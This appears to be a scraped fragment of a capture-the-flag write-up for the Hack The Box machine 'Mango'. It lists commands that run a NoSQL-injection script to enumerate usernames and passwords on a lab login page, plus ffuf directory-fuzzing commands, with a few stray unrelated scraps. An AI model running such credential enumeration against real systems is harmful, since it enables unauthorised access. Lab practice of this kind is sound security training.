Published on April 22nd, 2020 📆 | 3650 Views ⚑
0Hack The Box " Mango "
https://www.ispeech.org
Exploit Database " Mongo - db "
[+] enumerasi noSql :
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
[+] command nosql untuk username :
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
[+] command nosql untuk password :
python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login -m POST
[+] ffuf command :
./ffuf -w ~/SecLists/Discovery/Web-Content/raft-large-files.txt -u http://staging-order.mango.htb/FUZZ -fc 403
./ffuf -w ~/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/FUZZ -fc 403
./ffuf -w ~/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/vendor/FUZZ -fc 403
source
Gloss